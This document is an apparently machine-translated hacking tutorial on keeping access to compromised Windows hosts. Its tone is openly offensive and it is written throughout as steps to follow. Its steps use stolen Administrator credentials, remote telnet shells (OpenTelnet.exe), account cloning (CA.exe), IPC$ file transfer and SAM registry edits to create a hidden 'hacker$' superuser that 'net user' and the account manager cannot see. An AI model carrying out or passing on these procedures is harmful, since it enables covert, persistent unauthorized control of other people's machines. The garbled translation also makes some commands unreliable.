What do I want to do after successful intrusion? Oh! How much do you keep your eyes open and leave a backdoor or something? Backdoor Trojan programs are easy to be detected and killed. It is safer to create a hidden Super User. After studying and practicing it, the following methods are summarized to hide a Super User.
1. Use the account cloning tool to create
Clone Administrator(CA.exe). This tool can be used to Clone the Administrator account into a specified normal account (this normal account must already exist ). The cloned account has the same settings as the system's built-in Administrator. Using the NET command or User Manager, you cannot find that the permissions have been elevated. It is a good root kit.
Now let's take a look at how to use the account cloning tool to create hidden superusers on bots.
Scanning by traffic light, SuperScan, etc. Assume that the Administrator account of a remote host has been scanned, and its password is 123. We can use DameWare Mini Remote Control (DMRC) to remotely Control the Remote host in the GUI. You can also use the OpenTelnet.exe tool to enable the TELNET service for remote hosts. The command format is OpenTelnet.exe // server username password NTLMAuthor telnetport. Run the command opentelnet // 192. XX. XX.2 Administrator "123" 0 99! Run Telnet 192. XX. XX.2 99 and enter the account and password to obtain a SHELL.
First, find out which users are forbidden by careful administrators. In general, some administrators usually disable guest for security reasons, and of course Disable other users. In the graphic interface, it is very easy to identify. As long as you are in the account manager, you can see a red cross on the Disabled Account. However, in the command line status, you can only use the command "net user username" to check whether a user is disabled. If you are too tired to create a new account, run the following command: "Net user hacker $ youkou/add", and then run the command: "Net user hacker $/active: no.
Disconnect the connection with the remote connection. Use the Super User clone program ca.exe of Xiaoyi to clone the disabled user hacker $ into a Super User. The command is CA. EXE // 192. XX. XX.2 Administrator 123 hacker $ youkou. Success!
In this case, hacker $ becomes a Super User and has the same settings as Administrator (desktop, menu, and so on ). However, you must check whether cca.exe is used. The command is as follows: cca // 192. XX. XX.2 administrator 123.
No information is returned for this row? "[Hacker $] as same as [Administrator]" indicates that the hacker $ account is the same as the Administrator account and has been cloned successfully.
2. Create and hide super users through the graphic interface
I am afraid we are most familiar with the operations in the graphic interface. This is even better for creating hidden superusers on local computers, 3389 terminal service bots, or bots controlled by DMRC.
Do you know? In Windows 2000, there are two registry Editors: regedit.exeand regedt32.exe. in Windows XP, regedit.exeand regedt32.exe are actually one program. to modify the key value, right-click the shortcut menu and select "permission. Regedt32.exe is able to set permissions on the registry keys. For Windows NT/2000/XP Accounts, set "Full Control" to the "HKEY_LOCAL_MACHINE/SAM" key in the registry. In this way, you can read and write information in the SAM key.
Create a new account hacker $ in the zombie, which can be created in the account manager, or run the command: net user hacker $123/add. After that, you can open the Registry Editor by entering regedt32.exe and clicking "OK. Expand the sub-key HKEY_LOCAL_MACHINE/SAM, right-click the sub-key, and select "permission" from the shortcut menu.
In the displayed "SAM permission" dialog box, click "add" to add my Logon account to the "Group or user name" list, here I log on as the administrator, So I add the administrator and set the permission to "full control" in the lower permission functional area ".
TIPS:It is best to add the account you are logged on to or the group where the account is located. do not modify the original account or group. Otherwise, a series of unnecessary problems will occur. After the Super User is hidden, delete the account you added here.
If you still cannot expand the sub-key, close it and re-open it. If it is a Windows machine, close this registration table editor and re-open “regedit.exe ". Expand the sub-key: HKEY_LOCAL_MACHINE/SAM/domains/account/users/names/hacker $. In the window on the right, the default value is 0x3f1.
Next, export the items 000003f1 corresponding to hacker $, hacker $, and administrator 000001f4 as hacker. Reg, 3EE. Reg, and 1f4. reg to exit the Registry Editor. Use NotePad to open the exported files and edit them. Copy the value of the key "F" under item 000001f4 of the Super User, overwrite the value of the key "F" under the corresponding item 000003ee of hacker $, and then replace the value of hacker. reg and 3EE. reg is merged into hacker. reg. Next, execute net user hacker $/del in the command line to delete the user hacker $, and then import hacker. Reg into the registry.
Now, the hidden superuser hacker $ has been created. Open regedt32.exe and change the HKEY_LOCAL_MACHINE/SAM Key Permission to the original one (you only need to delete the added account administrator ).
Note:After the hidden superuser is created, the hacker $ user cannot be seen in the account manager, nor can the hacker $ user be seen by running the "Net user" command on the command line. However, after the superuser is created, you cannot change the password any more. If you use the net user command to change the password of hacker $, you will be able to see this hidden super user in the account manager and cannot delete it.
3. Create a command line to hide a Super User
First, use the opentelnet.exe tool to enable the telnet service for the remote host. Then, telnet to obtain a shell and create a new account. The command is:
Net user hacker $ youkou/add, and then export the Registry key HKEY_LOCAL_MACHINE/SAM/Domains/Account/Users. Run the following command:
Regedit.exe/e hacker. reg HKEY_LOCAL_MACHINE/SAM/Domains/Account/Users/, where/e is the parameter of regedit.exe, the HKEY_LOCAL_MACHINE/SAM/Domains/Account/Users Key must end.
Disconnect TELNET and establish an IPC session: net use // 192. XX. XX.2/ipc $ "123"/user: "administrator, and. reg is downloaded to the local machine and opened in Notepad. The editing command is: copy // 192. XX. XX.2/D $/hacker. reg, edited in notepad, copies the value of the key "F" under the superuser's corresponding item 000001F4, overwrite the value of the key "F" under the corresponding item 000003EE of hacker $ (the items corresponding to hacker $ are different from those on different machines). After editing, upload: copy hacker. reg // 192. XX. XX.2/D $/hacker1.reg.
TELNET to the remote host and run the command net user hacker $/del to delete the hacker $ account. reg import, command: regedit.exe/s hacker. reg. The parameter/s indicates that the data is imported in quiet mode. In this way, a hidden Super User is successfully created.
4. Create a remote zombie Registry
Another simple and convenient method is to create a hidden superuser by using the "connect to the network Registry" function in the console and Registry Editor "file" menu.
Click "run" in the "Start" menu, enter MMC, and press enter to open the console. In the "file" menu, click "Add/delete management unit" (shortcut: CTRL + M ), in the displayed dialog box, click "add" and select "local user and group" in the list in the "add independent management unit" dialog box ".
Click "add" to bring up the "select target machine" dialog box, select "another computer", enter the IP address of the remote computer, and click "finish ".
All the way back to the console window, we can manage the remote computer group and user, right-click in the blank window on the right, in the pop-up shortcut, select "new user" to create an account hacker $!
To edit the remote registry. Export the corresponding registration items and edit and modify them (similar to the above ).
Delete the newly created account hacker $ in the "console" and close it. Then, in the Registry Editor, use the "import" function in the "file" menu to import the file exported above.
If the remote host does not enable the Remote Registry Service, enable it on your own because you have the Administrator account and password at the beginning.
5. Notes
1. After a hidden superuser is created, the user is invisible in the account manager and in the command line, but the user exists.
2. After a hidden Super User is created, the password cannot be changed because the hidden Super User is exposed to the account manager and cannot be deleted.
3. When creating hidden superusers on the local machine, it is best to back up the Registry with the built-in backup tool.
Do you want to show your skills on your computer? Try it by yourself!